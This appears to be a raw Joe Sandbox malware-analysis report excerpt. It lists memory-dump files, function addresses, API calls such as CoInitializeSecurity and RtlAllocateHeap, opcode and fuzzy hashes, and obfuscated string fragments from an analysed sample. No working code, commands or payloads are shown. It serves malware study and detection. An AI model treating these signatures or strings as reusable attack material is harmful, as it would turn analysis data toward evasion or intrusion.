Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 87207e40e7e21d397725277bd40bfe911e67283c92b28169246f890b285c3fef
Instruction ID: 9fe9acce8af4bdb9637a47b91758da7a4d17ea7ecc2a862316a3b03aab1501ec
Opcode Fuzzy Hash: 87207e40e7e21d397725277bd40bfe911e67283c92b28169246f890b285c3fef
Instruction Fuzzy Hash: BFC09B703D4303B6F1330615AC67F6671747743F01F605804B7407C1D0CDF262219559

Function 00CD2F6F Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00CD2F82

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 6e67d66295e9b3eac9666599c4a47348a350b18e3e087fac83d9019cb9e6eb2d
Instruction ID: aa1b4ce096927a50bf9f25d2e3e915fb9dab3502f427c548ae1045d7ca8605c5
Opcode Fuzzy Hash: 6e67d66295e9b3eac9666599c4a47348a350b18e3e087fac83d9019cb9e6eb2d
Instruction Fuzzy Hash: 60C092313D8306B0F03006186C23F0530045303F30F701B11B338BC2D088D03100C11C

Function 00D03202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00D03208

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 672e78e22353364f8b8d2f379f7784838de51ae167f9e4aa7721d9fa854af864
Instruction ID: fa8ad18ab6aec87cdac2190f9f393a24e7af4fac900f2d09502a03dccb66c78b
Opcode Fuzzy Hash: 672e78e22353364f8b8d2f379f7784838de51ae167f9e4aa7721d9fa854af864
Instruction Fuzzy Hash: 3DB012300401007FDA041B00EC0AF003511EB00605F900050A101441F1D6655865C564

Function 00CD2F10 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CD2F60

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5925febbe87cc59c684f56244ce9872e25eadd6100f5abe325d9cc9505cc689b
Instruction ID: 331891465ac33dd189310f1c7e60c79764920e6d3733a2b6bc5aa5160695ec69
Opcode Fuzzy Hash: 5925febbe87cc59c684f56244ce9872e25eadd6100f5abe325d9cc9505cc689b
Instruction Fuzzy Hash: 68F082A5D10B006BD230BA3D9E0B7173DB8A706260F400729FCE58A7C4F620A82DCBD7

Non-executed Functions

Function 00CDDB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON

Download Yara Rule

Strings

<=:;, xrefs: 00CDE930
lkji, xrefs: 00CDE73E
xgfe, xrefs: 00CDE71D
@ONM, xrefs: 00CDE6DB
()./, xrefs: 00CDE9CA
89>?, xrefs: 00CDE9F6
QNOL, xrefs: 00CDE775
tsrq, xrefs: 00CDE6FC
`onm, xrefs: 00CDE733
89&', xrefs: 00CDE93B
`Y^_, xrefs: 00CDE99E
<=2, xrefs: 00CDEA01
D, xrefs: 00CDE846
tuJK, xrefs: 00CDE967
|, xrefs: 00CDECB1
DCBA, xrefs: 00CDE887, 00CDE896
mjkh, xrefs: 00CDE7D8
LKJI, xrefs: 00CDE6E6
dcba, xrefs: 00CDE728
AR, xrefs: 00CDDD10
WP, xrefs: 00CDDCEF
:WUE, xrefs: 00CDF6B7, 00CDF6C6
%*+(, xrefs: 00CDDE37, 00CDDE46
T, xrefs: 00CDF157

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
API String ID: 2994545307-1418943773
Opcode ID: 161ef686d6e804a84560721795835aef62d1a08ed293d1380b0e464d14b3fb72
Instruction ID: 6bd33512a24c203704b6115cff354fa9fd6cddb4c8996d56501a9841f55f5a59
Opcode Fuzzy Hash: 161ef686d6e804a84560721795835aef62d1a08ed293d1380b0e464d14b3fb72
Instruction Fuzzy Hash: 8EF288B05083819BD770DF14C884BABBBE6BFD5304F14482EE5D98B391EB719985CB92

Function 00CF23E0 Relevance: 31.3, APIs: 4, Strings: 12, Instructions: 3298COMMON

Download Yara Rule

Strings

:, xrefs: 00CF32DD
Cx, xrefs: 00CF453D
%*+(, xrefs: 00CF40EF
fedc, xrefs: 00CF2782
|}&C, xrefs: 00CF2F21
f@~!, xrefs: 00CF25FF
mlc@, xrefs: 00CF275C
{l`~, xrefs: 00CF268C
`tii, xrefs: 00CF2693
ggxz, xrefs: 00CF2685
aenQ, xrefs: 00CF276A
3<, xrefs: 00CF32D6

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C
API String ID: 0-786070067
Opcode ID: c7f563b26c4299747e38baf931bdf985d7b89e30753a12f68710b1218126e0f4
Instruction ID: 600a5a658fc482fb81301ae39abc86d6ce3537a86711179ac7fd8295c9cedf47
Opcode Fuzzy Hash: c7f563b26c4299747e38baf931bdf985d7b89e30753a12f68710b1218126e0f4
